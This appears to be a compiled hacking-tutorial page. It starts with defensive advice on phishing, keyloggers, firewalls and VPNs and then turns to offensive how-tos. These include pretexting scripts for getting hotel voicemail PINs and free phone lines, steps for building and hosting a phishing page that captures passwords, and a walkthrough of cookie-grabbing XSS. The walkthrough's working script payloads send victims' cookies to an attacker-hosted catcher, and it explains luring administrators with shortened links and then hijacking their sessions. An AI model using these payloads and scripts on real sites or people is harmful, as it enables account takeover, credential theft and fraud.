SECURE MAIL

How to protect your email account from being hacked


Protect Yourself
Now a days almost hackers are increasing in the level .  At any time your email account can be hacked, if you didn't aware about the security.  So you should know how to protect your mail account.

Most of them lost their email account because of not knowing the basic security things.  

Here i will explain you about  some of most online scams which fool people and make them lose their passwords and how to protect from therm.




1.Website Spoofing:

Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original) especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.

This sites are known as Phishing web page or fake page. The purpose of this web page is to steal your information,username,password. This page will look similar to original page . The url of page also will look similar to original site. But it is not right site. for eg: for gmail.com may be hacker create gmailwelcome.com which look like the gmail.com.

Solution:
✓ Never try to login/access your email account from the sites other than the original site.
✓  Always type the URL of the site in the address bar to get into the site. Never click on the hyperlink to enter the site.
 ✓ Check the url whether it is correct or not.

2.Protecting from Keyloggers:
To know about keylogger and how to prevent the keylogger read this tutorial.

3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES

Do you access your email from cyber cafes? Then definitely you are under the risk of loosing your password.In fact many people lose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.

This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.

SECURE SYSTEM FROM KEY LOGGERS

How to secure your system from Keyloggers


         Now a days keylogger is major problem for all.  So we should learn to secure our computer from keylogger.    This article will help for ethical hackers or who want to protect their pc.


What is Keylogger?

        Keylogger is one of spyware which will what type you through the keyboard and send it to hacker who send the keylogger. Hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data.  So whenever you type the username and password in gmail,online banking sites, it will send the username and password to hacker.

How to Protect?

In order to provide security for your system,you must have


Good AntiVirus:
This is basic and best step to protect your system from keylogger.  So buy a licensed and best antivirus which is currently in market.  My suggestion is Kaspersky, Norton or Mcafee.  Don't forget to update regularly.
Note: Don't use trial or cracked pack ,it is worthless to use.

Good Spyware:
Since keyloggers are basically spywares, if you are a frequent user of Internet then you could be exposed to thousands of keyloggers and spywares. So you should use a good antispyware such as NoAdware.


Antilogger can be Handy

Antiloggers are programs that detect the presence of

WHAT IS FIREWALL?

Introduction to firewalls
   When you use internet in your college/school/offfice , You may not be access some websites, right? Do you know how they block those websites? They use firewalls for block websites. Firewall prevent the system from hackers attack. Lets us what is firewall.

What is Firewall?
     Firewall is working like a security guard standing outside the office. Usually, What the security guard do? He will allow those who has identity card and block those who has not the identity card. Right? Likewise, The firewall will block unauthorized access to the system.
Firewall may be a software or hardware. It will work based on the set of rules defined by the administrator. Using Firewall administrator can block certain website from being accessed.
All traffic from inside and outside of the network must pass through the firewall.
Only authorized trafic will be allowed to pass (based on the set of rules)



Types of Fire Walls
 Packet Filtering
 Appliction level gate way
 Circuit level gate way.

Packet Filtering (Network Layer)
A packet filtering router applies a set of rules to each incoming IP packet and then forwards or discards the packets. Router is configured such that it can filter incoming and outgoing packets. The packets will filtered based on the source and destination IP address.
IP spoofing attack is possible in this packet filtering. IP spoofing can be achieved by changing the source IP address of packets.
Stateful Inspection Firewalls
A stateful inspection packet filters tightens the rules of TCP traffic by creating a state table of out bound TCP connection. If the packet matches with existing connection based on the state table, it will be allowed. If it does not match, It will be evaluted according to the rule set for new connections.


Aplictaion Level Gateway
Application level gateway is also known as proxy server. The user communicate with the gateway using application layer of TCP/IP stack. The gateway asks the user for the name of the remote host to be connected. When the user enters valid user ID, gateway will give access to the remote application. This will block the malicious activity and correct the application behavior. This will ensure the safety of company.
More secure than packet filtering. Easy to log and audit all incoming traffic at the application level. Application-level filtering may include protection against spam and viruses as well, and be able to block undesirable Web sites based on content rather than just their IP address

Circuit Level Gateway
The circuit level gateway works at session layer of OSI model. Monitor TCP handshaking between packets to make sure a session is legitimate. Traffic is filtered based on the session rules. Circuit-level firewalls hide the network itself from the outside, which is useful for denying access to intruders. But they don't filter individual packets. This firewall is used when the administrator trusts internal users.

Why Firewall?
 Firewall block unauthorized users, prohibits vulnerable services from entering or leaving the network.
Protection from IP spoofing and routing attacks.
 Protection against Remote login, Trojan backdoors, Session hijacking, cookie stealing,etc.
Limitation of Firewalls
The fiewall cannot protect against attacks that by pass the firewall.
The firewall does not protect against internal threats
The firewall cannot protect against the transfer of virus infected progams (or) files. It would be impossible for the firewall to scan all incoming files, emails for viruses.

BATCH PROGRAMMING

What is Batch file?
Batch files are a list of command line instructions that are "batched" together in one file. Most of the command lines can be executed within the command prompt, but batch files make the work load much easier. Batch files can be opened, copied, and edited using notepad.

They are used for simple routines and low-level machine instruction. On Windows, many batch files can be seen within the c:\Windows directory.

Batch files, more or less, make up the backbone of the Windows Operating System. The operating system must have access to these files and be able to add and delete instructions from them. Delete them, and you have effectively disabled the OS.



Basic Batch File Utilities and Commands


Note: Any DOS command can be used within a batch file, below are a list of commands used to support the structure and flow of the batch file

@
Place @ in front of commands that you don't want echoed within the process.

CLS
Clears the screen of any previous data.

CALL
Calls another batch file. Once other batch file isfinished, control is returned to the first (i.e. CALL c:\Windows\Newbat.bat).

BREAK ON/OFF
When turned on within the batch file, the user has an option of stopping the batch file by bressing Ctrl+Break.

GOTO - This command is used to go to another section of the batch file. Sections can be added by adding a colon infront of a name

(i.e. :FIRSTSECTION, :SECONDSECTION):


Quote::FIRSTSECTION
REM Welcome to the first section
GOTO :SECONDSECTION

Quote: :SECONDSECTION
REM Welcome to the second section
GOTO :END
:END

It is possible to loop with the GOTO command:
Quote::START
REM NO!!!!!!!!!!!!!!!!!! IT'S LOOPING!!!!!!!!!!!!!
GOTO :START

PAUSE
The pause command halts a proccess until a key is hit by the user. Displays the message, "Press any key to continue..."

REM
Allows a remark to be placed within the code, displaying a message to the user (i.e. REM HELLO!).

ECHO ON
Command process is shown to user; @ is usually placed before (@ECHO ON).

ECHO OFF
Command process is not shown to the user; @ is usually placed before (@ECHO OFF).

end
Ends the process.


Simple Batch Programming to show Hello message is :

@echo off
echo "hello world"

Type this code into notepad and save it with .bat extenstion(For eg: hello.bat)

By double clicking the batch file,you can run the file. Above batch file will show the hello world but we can' see it. because the window will open and closed within a second.

We will see later how to see it.

SECURE THE INTERNET CONNECTION

How To Hide your IP address and encrypt your connection

next, you need a VPN-Virtual Private Network, This will hide your ip address and encrypt your connection.

Step1: download hotspot shield

Note: If you can afford a paid VPN, it is recommended, but a good free one is Hotspot Shield.

Step2: Once you have downloaded and installed it, a web page should open up and it should connect to the VPN


Note: You cannot go to some sites when using a VPN. This is because of security.

Congratulations! You now have a VPN!

MAC SPOOFING

First we will spoof our MAC address.

MAC stands for "Media Access Control". It is commonly used by the authorities to trace hackers. To make it harder to trace us, we can change it!

Step1: Firstly, download the Program NMAC:

Step2 : After you have installed it, open it up, and click proceed. You should see a list at the top of the window.
Click on the first one.


Note: The drop-down box under “Network Connection" changes.

If you are using a wired connection, you need to select the one that says “Local Area Connection". If you are using a wireless connection, you need to select the one that says “Wireless Network Connection". If you are using a VPN, that should be visible too.

Step3: Once you have found the correct one, click "Random" as many times as you like.

Step4: Now click on "Update MAC".

Click "Yes" to the window that follows, and wait until you get a window telling you that the adapter was restarted successfully.

Now you just spoofed your MAC address!

TOP 10 HACKING TECHNIQUES OF 2009

1. Creating a rogue CA certificate
Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger

2. HTTP Parameter Pollution (HPP)
Luca Carettoni, Stefano diPaola

3. Flickr's API Signature Forgery Vulnerability (MD5 extension attack)
Thai Duong and Juliano Rizzo

4. Cross-domain search timing
Chris Evans

5. Slowloris HTTP DoS
Robert Hansen, (additional credit for earlier discovery to Adrian Ilarion Ciobanu & Ivan Ristic - “Programming Model Attacks” section of Apache Security for describing the attack, but did not produce a tool)

6. Microsoft IIS 0-Day Vulnerability Parsing Files (semi-colon bug)
Soroush Dalili

7. Exploiting unexploitable XSS
Stephen Sclafani

8. Our Favorite XSS Filters and how to Attack them
Eduardo Vela (sirdarckcat), David Lindsay (thornmaker)

9. RFC1918 Caching Security Issues
    Robert Hansen

10. DNS Rebinding (3-part series Persistent Cookies, Scraping & Spamming, and Session Fixation)
Robert Hansen

SOCIAL ENGINEERING

What is Social Engineering?
Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.[1] While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim.


"Social engineering" as an act of psychological manipulation was popularized by hacker-turned-consultant Kevin Mitnick. The term had previously been associated with the social sciences, but its usage has caught on among computer professionals.
Example 1: You receive an e-mail where the sender and the manager or someone on behalf of the support department of your bank.

In the message he says that the Internet Banking service is presenting a problem and that this problem can be corrected if you run the application attached to this message.

The implementation of this application presents a screen similar the one you use to access bank account, waiting for you to type your password. In fact, this application is prepared to steal your password to access the bank account and sends it to the attacker.

skip to methods of Social Engineering

Some Examples
Example 1: You receive an e-mail where the sender and the manager or someone on behalf of the support department of your bank.

In the message he says that the Internet Banking service is presenting a problem and that this problem can be corrected if you run the application attached to this message.

The implementation of this application presents a screen similar the one you use to access bank account, waiting for you to type your password. In fact, this application is prepared to steal your password to access the bank account and sends it to the attacker

Example 2: You receive an e-mail saying that your computer is infected by a virus. The message suggests that you install a tool available on an Internet site, to eliminate the virus from your computer.

The real function of this tool and does not eliminate a virus, but I give someone access to your computer and all data stored on it.

Example 3: a stranger calls your house and says it is the technical support of your ISP.
In this connection he says that his connection to the Internet is presenting a problem and then, ask your password to fix it. If you give your password, this so-called technical can perform a multitude of malicious activities, using your access account
Internet and therefore such activities relating to its name.

Practical Examples:

Retail Paging Systems
---------------------
Wal-Mart store phones have clearly marked buttons for the paging system. Wal-Mart is
the exception, not the rule. So how do you get on the paging system to have a little
fun when you're bored out of your mind shopping with your girlfriend? Social
engineering, my whipped friend. Find a phone and dial an extension, preferably the
store op. The key here is to become a harried employee, saying something similar
to..."This is Bill in shoes. What's the paging extension?" More often than not,
you'll get the extension without another word. Now, get some by saying something
sweet over the intercom.

Airport White Courtesy Phones
-----------------------------
Imagine you've already been stripped searched and you're waiting for your delayed
flight. Naturally, you gravitate to a phone. Is it white? Then you've got a free
call right in front of you. Just pick up to get the op. "This is Bill at Southwest,
Gate A5. We're swamped and our phones are tied. Can I get an outside line?" If
the phone does not have DTMF, or the op wants to dial the call for you, do not call
a number related to you.

Hotels
------
Hotels hold such promise. Some hotels have voice mail for each room, guests
receiving a PIN when they check in. Hotels also have "guest" phones; phones outside
of rooms that connect only to rooms or the front desk. Pick up a guest phone, make
like a friendly guest and say, "I forgot my PIN. Could I get it again? Room XXX."
Knowing the registered name of the target room helps, for the Hotel and Restaurant
Management Degree Program graduate may ask for it.

Do not follow through with the next social engineering example. Or, like the author,
try it on a friend. Go to the front desk and tell the attendant that you've locked
your key (card) in the laundromat, in your room, lost it, etc. Do not try this with
the attendant that checked you in. And again, do not enter someone's room without
permission.


Calling Technical Support
-------------------------
So you've found a new-fangled computerized phone and you want to learn more about it.
Do the same thing you do when you have trouble with your AOL - call tech support.
First, do a little planning (after getting the tech support number off of the phone
or the web). Get some info on the phone, like phone number, model number, other
identifying numbers, etc. Also, know the name of the facility in which the phone is
located. Now that you've got some ammo, you're ready to make the call. Posing as an
employee of the facility, call tech support and make up a problem for the phone
you've identified. Act a little dumb and be apologetic, acting like you don't want
to waste their time. All the while, pumping them for information - "I hate to bug
you for this, but <insert problem here>." <You'll get some info from tech support
here.> <Build on what you've learned and curiously ask another question.> And so
on until you reach the point where you can feel that it's time to end the call.
Occasionally acting amazed at their knowledge may be helpful.


Methods of Social Engineering

Phishing
Phishing is a technique of fraudulently obtaining private information. Typically, the phisher sends an e-mail that appears to come from a legitimate business — a bank, or credit card company — requesting "verification" of information and warning of some dire consequence if it is not provided. The e-mail usually contains a link to a fraudulent web page that seems legitimate — with company logos and content — and has a form requesting everything from a home address to an ATM card's PIN.

For example, 2003 saw the proliferation of a phishing scam in which users received e-mails supposedly from eBay claiming that the user's account was about to be suspended unless a link provided was clicked to update a credit card (information that the genuine eBay already had). Because it is relatively simple to make a Web site resemble a legitimate organization's site by mimicking the HTML code, the scam counted on people being tricked into thinking they were being contacted by eBay and subsequently, were going to eBay's site to update their account information. By spamming large groups of people, the "phisher" counted on the e-mail being read by a percentage of people who already had listed credit card numbers with eBay legitimately, who might respond.

Vishing or Phone Phishing:
This technique uses an Interactive Voice Response (IVR) system to recreate a legit sounding copy of a bank or other institution's IVR system. The slave is prompted to call in to the "bank" via a phone number provided in order to "verify" information.

Baiting
Baiting is like the real-world Trojan Horse that uses physical media and relies on the curiosity or greed of the slave. In this attack, the attacker leaves a malware infected floppy disc, CD ROM, or USB flash drive in a location sure to be found, gives it a legitimate looking and curiosity-piquing label, and simply waits for the slave to use the device.

Quid pro quo
Quid pro quo means something for something:

* An attacker calls random numbers at a company claiming to be calling back from technical support. Eventually they will hit someone with a legitimate problem, grateful that someone is calling back to help them. The attacker will "help" solve the problem and in the process have the user type commands that give the attacker access or launch malware.

* In a 2003 information security survey, 90% of office workers gave researchers what they claimed was their password in answer to a survey question in exchange for a cheap pen. Similar surveys in later years obtained similar results using chocolates and other cheap lures, although they made no attempt to validate the passwords.

EMAIL ATTACKS

The Basic level Hacking is Email Account Hacking.  Everyone like to do first email account hacking only.  So here is the tutorial for budding hackers about email Hacking.

There are different types of Email Account Hacking .  Here is some of them :

Social Engineering
Phishing
Brute Force Attack
 Keylogger
 Guessing the Answer for the Security Question


SOCIAL ENGINEERING:

Social engineering takes advantage of the weakest link in any organization’s
information security defenses: people. Social engineering is
“people hacking” and involves maliciously exploiting the trusting nature of
human beings to obtain information that can be used for personal gain.

Social engineering is one of the toughest hacks to perpetrate because it takes
great skill to come across as trustworthy to a stranger. It’s also by far the
toughest hack to protect against because people are involved.

Social Engineering is different from Physical Security exploits . In social engineering hackers will analyze about
victim.  Hackers will send mail to victim.  The contents will be related to the victim.

Eg:

✓ False support personnel claim that they need to install a patch or new
version of software on a user’s computer, talk the user into downloading
the software, and obtain remote control of the system.
✓ False vendors claim to need to update the organization’s accounting
package or phone system, ask for the administrator password, and
obtain full access.
✓ Phishing e-mails sent by external attackers gather user IDs and passwords
of unsuspecting recipients. Hackers then use those passwords to
gain access to bank accounts and more. A related attack exploits crosssite
scripting on Web forms.
✓ False employees notify the security desk that they have lost their keys
to the computer room, receive a set of keys from security, and obtain
unauthorized access to physical and electronic information.

 Phishing WebPage:

     It is a fake webpage which looks similar to the original page of the website.  Using this WebPage we can easily get the Password of victims.  The process involved in creating Phishing webpage are,
✓ First Visit the Website which is associated with the email id. Copy the Source code.
✓ Edit the the Source code such that it will store the password for you.
✓ Upload the Webpage to any free webhosting sites.  (don't select a famous hosting site,they will find that
    your page is fake). Try uploading through the proxy server.

Guessing the Answer for Security Question:
    Do you remember that the mail sites will ask for the security questions to retrieve the mail account?  You can hack the mail account simply guessing the answer.  If the victim is your friend ,then it may very easy to hack.



BRUTE FORCE ATTACK:



A famous and traditional attacking method .  In this method ,the password will be found by trying all possible passwords with any program or software.




KEYLOGGERS:


  It is one of the spyware which will capture what you type in the keyboard.  so whenever you type the username and password ,it will simply capture.

   It is software program which will be attached with any softwares and send to victim.  While victim install the software ,the keylogger also start to work.  Keyloggers are exe files

CROSS SITE SCRIPTING (XSS):COOKIE GRABBING

XSS is in 2 ways, Persistent and Non-Persistent type.

For XSS we will use something called a cookie catcher.
Question will be that why we would need someone else's cookie?
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking

First go to a free hosting site like http://www.110mb.com or other php hosting sites and register there. Then download this cookie catcher and upload it.

Cookie Catcher: http://adf.ly/Tdbm


What does the cookie catcher do?
It grabs the user's:
Cookies
IP
Referral link which what page it got to that link
Time and Date

Get Vulnerable sites:

Ok first we need sites that are vulnerable to XSS so it will work on them.
To test it we will need to add a code after the link.
I will use this site that many of you probably saw it before.
http://adf.ly/Tdo3

Now for testing if a site is vuln or not you can add these codes:


Code:
"><script>alert(document.cookie)</script>
Code:
'><script>alert(document.cookie)</script>
Code:
"><script>alert("Test")</script>
Code:
'><script>alert("Test")</script>
Or a new one which i found out myself which you can inject HTML:
Code:
"><body bgcolor="FF0000"></body>
Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>



Then if we see a java script popup like this:
Spoiler Click to View
Or if you used my testing and you saw the page's background go black or a page of google opens in that site means its vulnerable to XSS attacks.

In the end, if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>




Persistent XSS:

In this method we will grab the victim's cookies with no suspection and completely stealth.
Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.
Ok now lets go to this site: http://adf.ly/Tdo3
Now test and see if the XSS vulnerable test's work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type and submit it add this:



Code:
<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???
so they wont suspect you

Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be:
http://www.example.com/cookie catcher.php
the container of the cookies would be:
http://www.example.com/cookies.html

Now visit cookies.html and you would see the session of that cookie!



PS: the site i used doesn't support cookies so you can use: http://adf.ly/TeZV for cookie supporting.

Now there is another way for a cookie grabbing drive by, add this code and post it:


Code:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>


Then post it in the forum or the comment box.
Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a

<iframe src="www.google.com"></iframe> and you will understand iframes more

ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.



Non-Persistent XSS:

Ok in this method we will make the victim admin go to our link. First we will pick a XSS vuln site. For this method we will need a search.php which that page is vuln to XSS and has cookies in that page. In the vuln search.php in the textbox for the word to search for type:
Code:
<script>alert(document.cookie)</script>

and click the search button. If you see a javascript popup means its vuln to Non-Persistent XSS attack. Ok now we will do something similar.
I will use this link for this method: http://adf.ly/TeZV
Now in front of the search.php?search= add this:
Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
Now go to http://www.tinyurl.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vuln website and send a Fake Mail from a online fake mailer like this one:
http://hackcommunity.com/Thread-Anonymou...to-any-any

Now in the body just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the Tinyurl will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him


Session Hijacking:

Ok now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note opened Notepad. The ; separates cookies from each other so first copy the code before the ; .
Now go in that vuln website and clear the link. instead add this:
Code:
Javascript:void(document.cookie="")
or for an example:
Code:
Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")